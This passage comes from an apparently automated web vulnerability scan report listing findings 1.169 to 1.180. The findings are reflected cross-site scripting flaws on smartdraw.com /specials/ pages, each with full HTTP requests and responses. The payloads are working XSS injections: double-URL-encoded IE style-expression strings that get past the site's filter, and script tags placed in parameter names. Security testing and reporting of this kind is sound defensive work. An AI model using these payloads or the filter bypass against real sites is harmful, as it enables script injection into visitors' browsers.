<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22/?fbd65"style="x:expression(alert(1))"a43b560b887=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.169. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1 was submitted in the REST URL parameter 2. This input was echoed as 80d8a"style="x:expression(alert(1))"b9c460ef3f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8774
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gvwmqnneobzhy02artx2kqbp; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/80d8a"style="x:expression(alert(1))"b9c460ef3f1/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.170. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f was submitted in the REST URL parameter 2. This input was echoed as a1cdd"style="x:expression(alert(1))"48d79440d3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b00pwu55pf2clt55u0k5o0rq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/a1cdd"style="x:expression(alert(1))"48d79440d3f/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

1.171. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d74b"><script>alert(1)</script>7dda0913f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/diagram.asp/x22?8d74b"><script>alert(1)</script>7dda0913f6b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 03 Feb 2011 20:29:21 GMT
Content-Length: 12908
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=dia; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=wpmm4p551c2dea45k15ywp45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=99C7B3EB-F63C-4257-8835-C875E636C1F0; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: SDLINKID=9184; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/diagram.asp/x22/?8d74b"><script>alert(1)</script>7dda0913f6b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.172. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f932a"><script>alert(1)</script>9f207111f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/diagram.asp/x22?f932a"><script>alert(1)</script>9f207111f3=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=dia; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4dwhidrvpjbkw1msj4gobert; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=6103C386-4733-4A43-95B7-51E67A55D6CD; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: SDLINKID=9184; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12901
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/diagram.asp/x22/?f932a"><script>alert(1)</script>9f207111f3=1" rel="nofollow" target="_blank">
...[SNIP]...

1.173. http://www.smartdraw.com/specials/floorplans.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/floorplans.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b7f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522722649758a8 was submitted in the REST URL parameter 2. This input was echoed as 9b7f6"style="x:expression(alert(1))"722649758a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/9b7f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522722649758a8/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=n40tt5554keayxr2thqf5345; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/9b7f6"style="x:expression(alert(1))"722649758a8/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

1.174. http://www.smartdraw.com/specials/floorplans.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/floorplans.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32 was submitted in the REST URL parameter 2. This input was echoed as fb652"style="x:expression(alert(1))"3dd903a5e32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zbprv0455f2woe45n1vggnmm; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/fb652"style="x:expression(alert(1))"3dd903a5e32/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.175. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/floorplans.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be86b"><script>alert(1)</script>3870aea577b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/floorplans.asp/x22?be86b"><script>alert(1)</script>3870aea577b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=fpn; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=nt2h2455uxcxaky11tfmrdzo; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=1409283B-EDB5-4CA0-8629-95905BA865F1; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: SDLINKID=9188; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13081
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/floorplans.asp/x22/?be86b"><script>alert(1)</script>3870aea577b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.176. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/floorplans.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43486"><script>alert(1)</script>d3e5d5a301c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/floorplans.asp/x22?43486"><script>alert(1)</script>d3e5d5a301c=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=fpn; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=i0k42w45onnbee45xd5i5a45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=AC9569E3-A240-49CF-95D8-0CA3C93C810C; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: SDLINKID=9188; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13081
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/floorplans.asp/x22/?43486"><script>alert(1)</script>d3e5d5a301c=1" rel="nofollow" target="_blank">
...[SNIP]...

1.177. http://www.smartdraw.com/specials/flowchart.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/flowchart.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3212f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522de74a7c05db was submitted in the REST URL parameter 2. This input was echoed as 3212f"style="x:expression(alert(1))"de74a7c05db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/3212f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522de74a7c05db/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:22 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:22 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gfjqohyflklzjc3jlpnhf155; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/3212f"style="x:expression(alert(1))"de74a7c05db/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

1.178. http://www.smartdraw.com/specials/flowchart.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/flowchart.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0eacf7515f was submitted in the REST URL parameter 2. This input was echoed as 77d5c"style="x:expression(alert(1))"e0eacf7515f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/77d5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0eacf7515f/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ivhntdeja4wz04jdiflpz5ap; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/77d5c"style="x:expression(alert(1))"e0eacf7515f/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.179. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/flowchart.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bdc"><script>alert(1)</script>30cb10048cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/flowchart.asp/x22?c5bdc"><script>alert(1)</script>30cb10048cf=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=flo; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: ASP.NET_SessionId=vm0ob2bkdsyf5h55cuo0kgm2; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=1C945EF3-6CA5-4560-AB01-DF12269C31D7; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: SDLINKID=9189; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13400
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/flowchart.asp/x22/?c5bdc"><script>alert(1)</script>30cb10048cf=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.180. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/flowchart.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d17f1"><script>alert(1)</script>da242985d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/flowchart.asp/x22?d17f1"><script>alert(1)</script>da242985d73=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=flo; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytkcuz550fh0cezljmrjle45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=D2F0A619-5E50-4744-A7B3-37280A44868D; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: SDLINKID=9189; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13400
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/flowchart.asp/x22/?d17f1"><script>alert(1)</script>da242985d73=1" rel="nofollow" target="_blank">
...[SNIP]...

